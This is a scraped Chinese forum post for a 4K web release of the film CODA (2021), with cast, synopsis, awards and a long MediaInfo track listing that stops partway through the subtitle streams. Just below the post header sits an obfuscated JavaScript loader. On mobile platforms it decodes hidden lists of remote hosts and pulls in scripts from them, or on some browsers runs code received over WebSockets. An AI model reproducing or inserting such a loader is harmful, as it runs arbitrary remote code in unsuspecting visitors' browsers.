健听女孩[简繁字幕].Coda.2021.2160p.ATVP.WEB-DL.DDP5.1.Atmos.HEVC 24.61GB

版主小s 1月前 155

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 健听女孩 / 贝利叶一家 美国版 / 终曲
◎片  名 CODA
◎年  代 2021
◎产  地 美国
◎类  别 剧情
◎语  言 英语
◎上映日期 2021-01-29(圣丹斯电影节)
◎IMDb链接 https://www.imdb.com/title/tt10366460/
◎豆瓣评分 8.3/10 (82人评价)
◎豆瓣链接 https://movie.douban.com/subject/35048413/
◎片  长 111分钟
◎导  演 夏安·海德 Sian Heder (id:1219962)
◎编  剧 夏安·海德 Sian Heder (id:1219962)
◎演  员 艾米莉亚·琼斯 Emilia Jones (id:1318340)
       约翰·菲奥里 John Fiore (id:1283759)
       凯文·查普曼 Kevin Chapman (id:1280483)
       艾米·福赛思 Amy Forsyth (id:1356992)
       福迪亚·瓦尔什-匹罗 Ferdia Walsh-Peelo (id:1357404)
       玛丽·玛特琳 Marlee Matlin (id:1049675)
       欧赫尼奥·德尔维斯 Eugenio Derbez (id:1050224)
       何塞·冈斯·阿尔维斯 Jose Guns Alves (id:1446090)
       欧文·伯克 Owen Burke (id:1387221)
       梅利莎·麦克米金 Melissa McMeekin (id:1273144)
       埃里卡·麦克德莫特 Erica McDermott (id:1272004)
       大卫·纽森 David Newsom (id:1129597)
       大卫·布肯德尔 David Bookbinder (id:1231328)
       琪拉·皮查多 Kiara Pichardo (id:1416808)
       朗尼·法默 Lonnie Farmer (id:1454177)

◎标  签 美国 / 2021 / 剧情 / 美国电影 / 电影 / 圣丹斯 / Sundance2021 / 音乐

◎简  介
  故事聚焦一个聋哑家庭中唯一有听觉的高中女孩鲁比,她每天都要帮助父母和哥哥操持渔业生意,在加入高中合唱团后,鲁比对歌唱的热爱打动了合唱团长,团长决定让鲁比在梦想和家族之间做一个选择。

◎获奖情况 (共3项)
  第37届圣丹斯电影节 (2021)
  评审团大奖 剧情片
   └──夏安·海德 (id:1219962)
  观众奖 剧情片
   └──夏安·海德 (id:1219962)
  导演奖 剧情片
   └──夏安·海德 (id:1219962)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 139430775103111530327861203570291458009 (0x68E563F76A873C7277E7BB6535813FD9)

  4. Complete name                            : [email protected]kv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 24.6 GiB

  8. Duration                                 : 1 h 51 min

  9. Overall bit rate                         : 31.5 Mb/s

  10. Encoded date                             : UTC 2021-08-14 03:27:01

  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@High

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 51 min

  21. Bit rate                                 : 23.8 Mb/s

  22. Width                                    : 3 840 pixels

  23. Height                                   : 2 076 pixels

  24. Display aspect ratio                     : 1.85:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0 (Type 2)

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.125

  31. Stream size                              : 18.6 GiB (76%)

  32. Language                                 : English

  33. Default                                  : Yes

  34. Forced                                   : No

  35. Color range                              : Limited

  36. Color primaries                          : BT.2020

  37. Transfer characteristics                 : PQ

  38. Matrix coefficients                      : BT.2020 non-constant

  39. Mastering display color primaries        : Display P3

  40. Mastering display luminance              : min: 0.0050 cd/m2, max: 1000 cd/m2

  41. Maximum Content Light Level              : 1438 cd/m2

  42. Maximum Frame-Average Light Level        : 133 cd/m2


  43. Audio #1

  44. ID                                       : 2

  45. Format                                   : E-AC-3 JOC

  46. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  47. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  48. Codec ID                                 : A_EAC3

  49. Duration                                 : 1 h 51 min

  50. Bit rate mode                            : Constant

  51. Bit rate                                 : 768 kb/s

  52. Channel(s)                               : 6 channels

  53. Channel layout                           : L R C LFE Ls Rs

  54. Sampling rate                            : 48.0 kHz

  55. Frame rate                               : 31.250 FPS (1536 SPF)

  56. Compression mode                         : Lossy

  57. Stream size                              : 614 MiB (2%)

  58. Title                                    : English

  59. Language                                 : English

  60. Service kind                             : Complete Main

  61. Default                                  : Yes

  62. Forced                                   : No

  63. Complexity index                         : 16

  64. Number of dynamic objects                : 15

  65. Bed channel count                        : 1 channel

  66. Bed channel configuration                : LFE


  67. Audio #2

  68. ID                                       : 3

  69. Format                                   : E-AC-3 JOC

  70. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  71. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  72. Codec ID                                 : A_EAC3

  73. Duration                                 : 1 h 51 min

  74. Bit rate mode                            : Constant

  75. Bit rate                                 : 768 kb/s

  76. Channel(s)                               : 6 channels

  77. Channel layout                           : L R C LFE Ls Rs

  78. Sampling rate                            : 48.0 kHz

  79. Frame rate                               : 31.250 FPS (1536 SPF)

  80. Compression mode                         : Lossy

  81. Stream size                              : 614 MiB (2%)

  82. Title                                    : French

  83. Language                                 : French

  84. Service kind                             : Complete Main

  85. Default                                  : No

  86. Forced                                   : No

  87. Complexity index                         : 16

  88. Number of dynamic objects                : 15

  89. Bed channel count                        : 1 channel

  90. Bed channel configuration                : LFE


  91. Audio #3

  92. ID                                       : 4

  93. Format                                   : E-AC-3 JOC

  94. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  95. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  96. Codec ID                                 : A_EAC3

  97. Duration                                 : 1 h 51 min

  98. Bit rate mode                            : Constant

  99. Bit rate                                 : 768 kb/s

  100. Channel(s)                               : 6 channels

  101. Channel layout                           : L R C LFE Ls Rs

  102. Sampling rate                            : 48.0 kHz

  103. Frame rate                               : 31.250 FPS (1536 SPF)

  104. Compression mode                         : Lossy

  105. Stream size                              : 614 MiB (2%)

  106. Title                                    : French Canadian

  107. Language                                 : French

  108. Service kind                             : Complete Main

  109. Default                                  : No

  110. Forced                                   : No

  111. Complexity index                         : 16

  112. Number of dynamic objects                : 15

  113. Bed channel count                        : 1 channel

  114. Bed channel configuration                : LFE


  115. Audio #4

  116. ID                                       : 5

  117. Format                                   : E-AC-3 JOC

  118. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  119. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  120. Codec ID                                 : A_EAC3

  121. Duration                                 : 1 h 51 min

  122. Bit rate mode                            : Constant

  123. Bit rate                                 : 768 kb/s

  124. Channel(s)                               : 6 channels

  125. Channel layout                           : L R C LFE Ls Rs

  126. Sampling rate                            : 48.0 kHz

  127. Frame rate                               : 31.250 FPS (1536 SPF)

  128. Compression mode                         : Lossy

  129. Stream size                              : 614 MiB (2%)

  130. Title                                    : German

  131. Language                                 : German

  132. Service kind                             : Complete Main

  133. Default                                  : No

  134. Forced                                   : No

  135. Complexity index                         : 16

  136. Number of dynamic objects                : 15

  137. Bed channel count                        : 1 channel

  138. Bed channel configuration                : LFE


  139. Audio #5

  140. ID                                       : 6

  141. Format                                   : E-AC-3 JOC

  142. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  143. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  144. Codec ID                                 : A_EAC3

  145. Duration                                 : 1 h 51 min

  146. Bit rate mode                            : Constant

  147. Bit rate                                 : 768 kb/s

  148. Channel(s)                               : 6 channels

  149. Channel layout                           : L R C LFE Ls Rs

  150. Sampling rate                            : 48.0 kHz

  151. Frame rate                               : 31.250 FPS (1536 SPF)

  152. Compression mode                         : Lossy

  153. Stream size                              : 614 MiB (2%)

  154. Title                                    : Italian

  155. Language                                 : Italian

  156. Service kind                             : Complete Main

  157. Default                                  : No

  158. Forced                                   : No

  159. Complexity index                         : 16

  160. Number of dynamic objects                : 15

  161. Bed channel count                        : 1 channel

  162. Bed channel configuration                : LFE


  163. Audio #6

  164. ID                                       : 7

  165. Format                                   : E-AC-3 JOC

  166. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  167. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  168. Codec ID                                 : A_EAC3

  169. Duration                                 : 1 h 51 min

  170. Bit rate mode                            : Constant

  171. Bit rate                                 : 768 kb/s

  172. Channel(s)                               : 6 channels

  173. Channel layout                           : L R C LFE Ls Rs

  174. Sampling rate                            : 48.0 kHz

  175. Frame rate                               : 31.250 FPS (1536 SPF)

  176. Compression mode                         : Lossy

  177. Stream size                              : 614 MiB (2%)

  178. Title                                    : Japanese

  179. Language                                 : Japanese

  180. Service kind                             : Complete Main

  181. Default                                  : No

  182. Forced                                   : No

  183. Complexity index                         : 16

  184. Number of dynamic objects                : 15

  185. Bed channel count                        : 1 channel

  186. Bed channel configuration                : LFE


  187. Audio #7

  188. ID                                       : 8

  189. Format                                   : E-AC-3 JOC

  190. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  191. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  192. Codec ID                                 : A_EAC3

  193. Duration                                 : 1 h 51 min

  194. Bit rate mode                            : Constant

  195. Bit rate                                 : 768 kb/s

  196. Channel(s)                               : 6 channels

  197. Channel layout                           : L R C LFE Ls Rs

  198. Sampling rate                            : 48.0 kHz

  199. Frame rate                               : 31.250 FPS (1536 SPF)

  200. Compression mode                         : Lossy

  201. Stream size                              : 614 MiB (2%)

  202. Title                                    : Brazilian Portuguese

  203. Language                                 : Portuguese

  204. Service kind                             : Complete Main

  205. Default                                  : No

  206. Forced                                   : No

  207. Complexity index                         : 16

  208. Number of dynamic objects                : 15

  209. Bed channel count                        : 1 channel

  210. Bed channel configuration                : LFE


  211. Audio #8

  212. ID                                       : 9

  213. Format                                   : E-AC-3 JOC

  214. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  215. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  216. Codec ID                                 : A_EAC3

  217. Duration                                 : 1 h 51 min

  218. Bit rate mode                            : Constant

  219. Bit rate                                 : 768 kb/s

  220. Channel(s)                               : 6 channels

  221. Channel layout                           : L R C LFE Ls Rs

  222. Sampling rate                            : 48.0 kHz

  223. Frame rate                               : 31.250 FPS (1536 SPF)

  224. Compression mode                         : Lossy

  225. Stream size                              : 614 MiB (2%)

  226. Title                                    : Russian

  227. Language                                 : Russian

  228. Service kind                             : Complete Main

  229. Default                                  : No

  230. Forced                                   : No

  231. Complexity index                         : 16

  232. Number of dynamic objects                : 15

  233. Bed channel count                        : 1 channel

  234. Bed channel configuration                : LFE


  235. Audio #9

  236. ID                                       : 10

  237. Format                                   : E-AC-3 JOC

  238. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  239. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  240. Codec ID                                 : A_EAC3

  241. Duration                                 : 1 h 51 min

  242. Bit rate mode                            : Constant

  243. Bit rate                                 : 768 kb/s

  244. Channel(s)                               : 6 channels

  245. Channel layout                           : L R C LFE Ls Rs

  246. Sampling rate                            : 48.0 kHz

  247. Frame rate                               : 31.250 FPS (1536 SPF)

  248. Compression mode                         : Lossy

  249. Stream size                              : 614 MiB (2%)

  250. Title                                    : Spanish

  251. Language                                 : Spanish

  252. Service kind                             : Complete Main

  253. Default                                  : No

  254. Forced                                   : No

  255. Complexity index                         : 16

  256. Number of dynamic objects                : 15

  257. Bed channel count                        : 1 channel

  258. Bed channel configuration                : LFE


  259. Audio #10

  260. ID                                       : 11

  261. Format                                   : E-AC-3 JOC

  262. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  263. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  264. Codec ID                                 : A_EAC3

  265. Duration                                 : 1 h 51 min

  266. Bit rate mode                            : Constant

  267. Bit rate                                 : 768 kb/s

  268. Channel(s)                               : 6 channels

  269. Channel layout                           : L R C LFE Ls Rs

  270. Sampling rate                            : 48.0 kHz

  271. Frame rate                               : 31.250 FPS (1536 SPF)

  272. Compression mode                         : Lossy

  273. Stream size                              : 614 MiB (2%)

  274. Title                                    : European Spanish

  275. Language                                 : Spanish

  276. Service kind                             : Complete Main

  277. Default                                  : No

  278. Forced                                   : No

  279. Complexity index                         : 16

  280. Number of dynamic objects                : 15

  281. Bed channel count                        : 1 channel

  282. Bed channel configuration                : LFE


  283. Text #1

  284. ID                                       : 12

  285. Format                                   : UTF-8

  286. Codec ID                                 : S_TEXT/UTF8

  287. Codec ID/Info                            : UTF-8 Plain Text

  288. Duration                                 : 1 h 50 min

  289. Bit rate                                 : 113 b/s

  290. Count of elements                        : 1365

  291. Stream size                              : 92.1 KiB (0%)

  292. Title                                    : Hindi

  293. Language                                 : Hindi

  294. Default                                  : No

  295. Forced                                   : No


  296. Text #2

  297. ID                                       : 13

  298. Format                                   : UTF-8

  299. Codec ID                                 : S_TEXT/UTF8

  300. Codec ID/Info                            : UTF-8 Plain Text

  301. Duration                                 : 1 h 50 min

  302. Bit rate                                 : 145 b/s

  303. Count of elements                        : 1362

  304. Stream size                              : 118 KiB (0%)

  305. Title                                    : Tamil

  306. Language                                 : Tamil

  307. Default                                  : No

  308. Forced                                   : No


  309. Text #3

  310. ID                                       : 14

  311. Format                                   : UTF-8

  312. Codec ID                                 : S_TEXT/UTF8

  313. Codec ID/Info                            : UTF-8 Plain Text

  314. Duration                                 : 1 h 50 min

  315. Bit rate                                 : 123 b/s

  316. Count of elements                        : 1364

  317. Stream size                              : 99.7 KiB (0%)

  318. Title                                    : Telugu

  319. Language                                 : Telugu

  320. Default                                  : No

  321. Forced                                   : No


  322. Text #4

  323. ID                                       : 15

  324. Format                                   : UTF-8

  325. Codec ID                                 : S_TEXT/UTF8

  326. Codec ID/Info                            : UTF-8 Plain Text

  327. Duration                                 : 1 h 43 min

  328. Bit rate                                 : 47 b/s

  329. Count of elements                        : 1407

  330. Stream size                              : 36.1 KiB (0%)

  331. Title                                    : English

  332. Language                                 : English

  333. Default                                  : Yes

  334. Forced                                   : No


  335. Text #5

  336. ID                                       : 16

  337. Format                                   : UTF-8

  338. Codec ID                                 : S_TEXT/UTF8

  339. Codec ID/Info                            : UTF-8 Plain Text

  340. Duration                                 : 1 h 50 min

  341. Bit rate                                 : 66 b/s

  342. Count of elements                        : 1357

  343. Stream size                              : 53.7 KiB (0%)

  344. Title                                    : Arabic

  345. Language                                 : Arabic

  346. Default                                  : No

  347. Forced                                   : No


  348. Text #6

  349. ID                                       : 17

  350. Format                                   : UTF-8

  351. Codec ID                                 : S_TEXT/UTF8

  352. Codec ID/Info                            : UTF-8 Plain Text

  353. Duration                                 : 1 h 50 min

  354. Bit rate                                 : 65 b/s

  355. Count of elements                        : 1304

  356. Stream size                              : 52.8 KiB (0%)

  357. Title                                    : Bulgarian

  358. Language                                 : Bulgarian

  359. Default                                  : No

  360. Forced                                   : No


  361. Text #7

  362. ID                                       : 18

  363. Format                                   : UTF-8

  364. Codec ID                                 : S_TEXT/UTF8

  365. Codec ID/Info                            : UTF-8 Plain Text

  366. Duration                                 : 1 h 50 min

  367. Bit rate                                 : 40 b/s

  368. Count of elements                        : 1267

  369. Stream size                              : 33.3 KiB (0%)

  370. Title                                    : Czech

  371. Language                                 : Czech

  372. Default                                  : No

  373. Forced                                   : No


  374. Text #8

  375. ID                                       : 19

  376. Format                                   : UTF-8

  377. Codec ID                                 : S_TEXT/UTF8

  378. Codec ID/Info                            : UTF-8 Plain Text

  379. Duration                                 : 1 h 50 min

  380. Bit rate                                 : 43 b/s

  381. Count of elements                        : 1230

  382. Stream size                              : 35.5 KiB (0%)

  383. Title                                    : Danish

  384. Language                                 : Danish

  385. Default                                  : No

  386. Forced                                   : No


  387. Text #9

  388. ID                                       : 20

  389. Format                                   : UTF-8

  390. Codec ID                                 : S_TEXT/UTF8

  391. Codec ID/Info                            : UTF-8 Plain Text

  392. Duration                                 : 1 h 50 min

  393. Bit rate                                 : 40 b/s

  394. Count of elements                        : 1119

  395. Stream size                              : 33.1 KiB (0%)

  396. Title                                    : Dutch

  397. Language                                 : Dutch

  398. Default                                  : No

  399. Forced                                   : No


  400. Text #10

  401. ID                                       : 21

  402. Format                                   : UTF-8

  403. Codec ID                                 : S_TEXT/UTF8

  404. Codec ID/Info                            : UTF-8 Plain Text

  405. Duration                                 : 1 h 50 min

  406. Bit rate                                 : 39 b/s

  407. Count of elements                        : 1231

  408. Stream size                              : 32.3 KiB (0%)

  409. Title                                    : Estonian

  410. Language                                 : Estonian

  411. Default                                  : No

  412. Forced                                   : No


  413. Text #11

  414. ID                                       : 22

  415. Format                                   : UTF-8

  416. Codec ID                                 : S_TEXT/UTF8

  417. Codec ID/Info                            : UTF-8 Plain Text

  418. Duration                                 : 1 h 50 min

  419. Bit rate                                 : 43 b/s

  420. Count of elements                        : 1362

  421. Stream size                              : 35.5 KiB (0%)

  422. Title                                    : Finnish

  423. Language                                 : Finnish

  424. Default                                  : No

  425. Forced                                   : No


  426. Text #12

  427. ID                                       : 23

  428. Format                                   : UTF-8

  429. Codec ID                                 : S_TEXT/UTF8

  430. Codec ID/Info                            : UTF-8 Plain Text

  431. Duration                                 : 1 h 49 min

  432. Bit rate                                 : 40 b/s

  433. Count of elements                        : 1187

  434. Stream size                              : 32.4 KiB (0%)

  435. Title                                    : French

  436. Language                                 : French

  437. Default                                  : No

  438. Forced                                   : No


  439. Text #13

  440. ID                                       : 24

  441. Format                                   : UTF-8

  442. Codec ID                                 : S_TEXT/UTF8

  443. Codec ID/Info                            : UTF-8 Plain Text

  444. Duration                                 : 1 h 50 min

  445. Bit rate                                 : 39 b/s

  446. Count of elements                        : 1188

  447. Stream size                              : 32.4 KiB (0%)

  448. Title                                    : French Canadian

  449. Language                                 : French

  450. Default                                  : No

  451. Forced                                   : No


  452. Text #14

  453. ID                                       : 25

  454. Format                                   : UTF-8

  455. Codec ID                                 : S_TEXT/UTF8

  456. Codec ID/Info                            : UTF-8 Plain Text

  457. Duration                                 : 1 h 50 min

  458. Bit rate                                 : 39 b/s

  459. Count of elements                        : 1188

  460. Stream size                              : 32.4 KiB (0%)

  461. Title                                    : Canadian French

  462. Language                                 : French

  463. Default                                  : No

  464. Forced                                   : No


  465. Text #15

  466. ID                                       : 26

  467. Format                                   : UTF-8

  468. Codec ID                                 : S_TEXT/UTF8

  469. Codec ID/Info                            : UTF-8 Plain Text

  470. Duration                                 : 1 h 50 min

  471. Bit rate                                 : 46 b/s

  472. Count of elements                        : 1151

  473. Stream size                              : 37.5 KiB (0%)

  474. Title                                    : German

  475. Language                                 : German

  476. Default                                  : No

  477. Forced                                   : No


  478. Text #16

  479. ID                                       : 27

  480. Format                                   : UTF-8

  481. Codec ID                                 : S_TEXT/UTF8

  482. Codec ID/Info                            : UTF-8 Plain Text

  483. Duration                                 : 1 h 50 min

  484. Bit rate                                 : 73 b/s

  485. Count of elements                        : 1342

  486. Stream size                              : 59.5 KiB (0%)

  487. Title                                    : Greek

  488. Language                                 : Greek

  489. Default                                  : No

  490. Forced                                   : No


  491. Text #17

  492. ID                                       : 28

  493. Format                                   : UTF-8

  494. Codec ID                                 : S_TEXT/UTF8

  495. Codec ID/Info                            : UTF-8 Plain Text

  496. Duration                                 : 1 h 50 min

  497. Bit rate                                 : 57 b/s

  498. Count of elements                        : 1362

  499. Stream size                              : 46.7 KiB (0%)

  500. Title                                    : Hebrew

  501. Language                                 : Hebrew

  502. Default                                  : No

  503. Forced                                   : No


  504. Text #18

  505. ID                                       : 29

  506. Format                                   : UTF-8

  507. Codec ID                                 : S_TEXT/UTF8

  508. Codec ID/Info                            : UTF-8 Plain Text

  509. Duration                                 : 1 h 50 min

  510. Bit rate                                 : 42 b/s

  511. Count of elements                        : 1362

  512. Stream size                              : 34.1 KiB (0%)

  513. Title                                    : Hungarian

  514. Language                                 : Hungarian

  515. Default                                  : No

  516. Forced                                   : No


  517. Text #19

  518. ID                                       : 30

  519. Format                                   : UTF-8

  520. Codec ID                                 : S_TEXT/UTF8

  521. Codec ID/Info                            : UTF-8 Plain Text

  522. Duration                                 : 1 h 50 min

  523. Bit rate                                 : 42 b/s

  524. Count of elements                        : 1363

  525. Stream size                              : 34.5 KiB (0%)

  526. Title                                    : Indonesian

  527. Language                                 : Indonesian

  528. Default                                  : No

  529. Forced                                   : No


  530. Text #20

  531. ID                                       : 31

  532. Format                                   : UTF-8

  533. Codec ID                                 : S_TEXT/UTF8

  534. Codec ID/Info                            : UTF-8 Plain Text

  535. Duration                                 : 1 h 50 min

  536. Bit rate                                 : 45 b/s

  537. Count of elements                        : 1363

  538. Stream size                              : 36.5 KiB (0%)

  539. Title                                    : Italian

  540. Language                                 : Italian

  541. Default                                  : No

  542. Forced                                   : No


  543. Text #21

  544. ID                                       : 32

  545. Format                                   : UTF-8

  546. Codec ID                                 : S_TEXT/UTF8

  547. Codec ID/Info                            : UTF-8 Plain Text

  548. Duration                                 : 1 h 50 min

  549. Bit rate                                 : 42 b/s

  550. Count of elements                        : 1204

  551. Stream size                              : 34.8 KiB (0%)

  552. Title                                    : Japanese

  553. Language                                 : Japanese

  554. Default                                  : No

  555. Forced                                   : No


  556. Text #22

  557. ID                                       : 33

  558. Format                                   : UTF-8

  559. Codec ID                                 : S_TEXT/UTF8

  560. Codec ID/Info                            : UTF-8 Plain Text

  561. Duration                                 : 1 h 50 min

  562. Bit rate                                 : 44 b/s

  563. Count of elements                        : 1365

  564. Stream size                              : 36.5 KiB (0%)

  565. Title                                    : Korean

  566. Language                                 : Korean

  567. Default                                  : No

  568. Forced                                   : No


  569. Text #23

  570. ID                                       : 34

  571. Format                                   : UTF-8

  572. Codec ID                                 : S_TEXT/UTF8

  573. Codec ID/Info                            : UTF-8 Plain Text

  574. Duration                                 : 1 h 50 min

  575. Bit rate                                 : 43 b/s

  576. Count of elements                        : 1364

  577. Stream size                              : 35.4 KiB (0%)

  578. Title                                    : Lithuanian

  579. Language                                 : Lithuanian

  580. Default                                  : No

  581. Forced                                   : No


  582. Text #24

  583. ID                                       : 35

  584. Format                                   : UTF-8

  585. Codec ID                                 : S_TEXT/UTF8

  586. Codec ID/Info                            : UTF-8 Plain Text

  587. Duration                                 : 1 h 50 min

  588. Bit rate                                 : 42 b/s

  589. Count of elements                        : 1363

  590. Stream size                              : 34.3 KiB (0%)

  591. Title                                    : Latvian

  592. Language                                 : Latvian

  593. Default                                  : No

  594. Forced                                   : No


  595. Text #25

  596. ID                                       : 36

  597. Format                                   : UTF-8

  598. Codec ID                                 : S_TEXT/UTF8

  599. Codec ID/Info                            : UTF-8 Plain Text

  600. Duration                                 : 1 h 50 min

  601. Bit rate                                 : 43 b/s

  602. Count of elements                        : 1363

  603. Stream size                              : 35.1 KiB (0%)

  604. Title                                    : Malay

  605. Language                                 : Malay

  606. Default                                  : No

  607. Forced                                   : No


  608. Text #26

  609. ID                                       : 37

  610. Format                                   : UTF-8

  611. Codec ID                                 : S_TEXT/UTF8

  612. Codec ID/Info                            : UTF-8 Plain Text

  613. Duration                                 : 1 h 50 min

  614. Bit rate                                 : 41 b/s

  615. Count of elements                        : 1364

  616. Stream size                              : 33.8 KiB (0%)

  617. Title                                    : Chinese(Simplified)

  618. Language                                 : Chinese

  619. Default                                  : No

  620. Forced                                   : No


  621. Text #27

  622. ID                                       : 38

  623. Format                                   : UTF-8

  624. Codec ID                                 : S_TEXT/UTF8

  625. Codec ID/Info                            : UTF-8 Plain Text

  626. Duration                                 : 1 h 50 min

  627. Bit rate                                 : 42 b/s

  628. Count of elements                        : 1365

  629. Stream size                              : 34.8 KiB (0%)

  630. Title                                    : Chinese(Traditional)

  631. Language                                 : Chinese

  632. Default                                  : No

  633. Forced                                   : No


  634. Text #28

  635. ID                                       : 39

  636. Format                                   : UTF-8

  637. Codec ID                                 : S_TEXT/UTF8

  638. Codec ID/Info                            : UTF-8 Plain Text

  639. Duration                                 : 1 h 50 min

  640. Bit rate                                 : 41 b/s

  641. Count of elements                        : 1365

  642. Stream size                              : 33.8 KiB (0%)

  643. Title                                    : Chinese(Cantonese)

  644. Language                                 : Chinese

  645. Default                                  : No

  646. Forced                                   : No


  647. Text #29

  648. ID                                       : 40

  649. Format                                   : UTF-8

  650. Codec ID                                 : S_TEXT/UTF8

  651. Codec ID/Info                            : UTF-8 Plain Text

  652. Duration                                 : 1 h 50 min

  653. Bit rate                                 : 43 b/s

  654. Count of elements                        : 1236

  655. Stream size                              : 35.1 KiB (0%)

  656. Title                                    : Norwegian

  657. Language                                 : Norwegian

  658. Default                                  : No

  659. Forced                                   : No


  660. Text #30

  661. ID                                       : 41

  662. Format                                   : UTF-8

  663. Codec ID                                 : S_TEXT/UTF8

  664. Codec ID/Info                            : UTF-8 Plain Text

  665. Duration                                 : 1 h 50 min

  666. Bit rate                                 : 40 b/s

  667. Count of elements                        : 1300

  668. Stream size                              : 32.4 KiB (0%)

  669. Title                                    : Polish

  670. Language                                 : Polish

  671. Default                                  : No

  672. Forced                                   : No


  673. Text #31

  674. ID                                       : 42

  675. Format                                   : UTF-8

  676. Codec ID                                 : S_TEXT/UTF8

  677. Codec ID/Info                            : UTF-8 Plain Text

  678. Duration                                 : 1 h 50 min

  679. Bit rate                                 : 43 b/s

  680. Count of elements                        : 1340

  681. Stream size                              : 35.3 KiB (0%)

  682. Title                                    : Portuguese

  683. Language                                 : Portuguese

  684. Default                                  : No

  685. Forced                                   : No


  686. Text #32

  687. ID                                       : 43

  688. Format                                   : UTF-8

  689. Codec ID                                 : S_TEXT/UTF8

  690. Codec ID/Info                            : UTF-8 Plain Text

  691. Duration                                 : 1 h 50 min

  692. Bit rate                                 : 38 b/s

  693. Count of elements                        : 1364

  694. Stream size                              : 31.5 KiB (0%)

  695. Title                                    : Brazilian Portuguese

  696. Language                                 : Portuguese

  697. Default                                  : No

  698. Forced                                   : No


  699. Text #33

  700. ID                                       : 44

  701. Format                                   : UTF-8

  702. Codec ID                                 : S_TEXT/UTF8

  703. Codec ID/Info                            : UTF-8 Plain Text

  704. Duration                                 : 1 h 50 min

  705. Bit rate                                 : 67 b/s

  706. Count of elements                        : 1246

  707. Stream size                              : 54.9 KiB (0%)

  708. Title                                    : Russian

  709. Language                                 : Russian

  710. Default                                  : No

  711. Forced                                   : No


  712. Text #34

  713. ID                                       : 45

  714. Format                                   : UTF-8

  715. Codec ID                                 : S_TEXT/UTF8

  716. Codec ID/Info                            : UTF-8 Plain Text

  717. Duration                                 : 1 h 50 min

  718. Bit rate                                 : 42 b/s

  719. Count of elements                        : 1362

  720. Stream size                              : 34.0 KiB (0%)

  721. Title                                    : Slovak

  722. Language                                 : Slovak

  723. Default                                  : No

  724. Forced                                   : No


  725. Text #35

  726. ID                                       : 46

  727. Format                                   : UTF-8

  728. Codec ID                                 : S_TEXT/UTF8

  729. Codec ID/Info                            : UTF-8 Plain Text

  730. Duration                                 : 1 h 50 min

  731. Bit rate                                 : 35 b/s

  732. Count of elements                        : 1176

  733. Stream size                              : 29.0 KiB (0%)

  734. Title                                    : Slovenian

  735. Language                                 : Slovenian

  736. Default                                  : No

  737. Forced                                   : No


  738. Text #36

  739. ID                                       : 47

  740. Format                                   : UTF-8

  741. Codec ID                                 : S_TEXT/UTF8

  742. Codec ID/Info                            : UTF-8 Plain Text

  743. Duration                                 : 1 h 50 min

  744. Bit rate                                 : 43 b/s

  745. Count of elements                        : 1368

  746. Stream size                              : 35.4 KiB (0%)

  747. Title                                    : Spanish

  748. Language                                 : Spanish

  749. Default                                  : No

  750. Forced                                   : No


  751. Text #37

  752. ID                                       : 48

  753. Format                                   : UTF-8

  754. Codec ID                                 : S_TEXT/UTF8

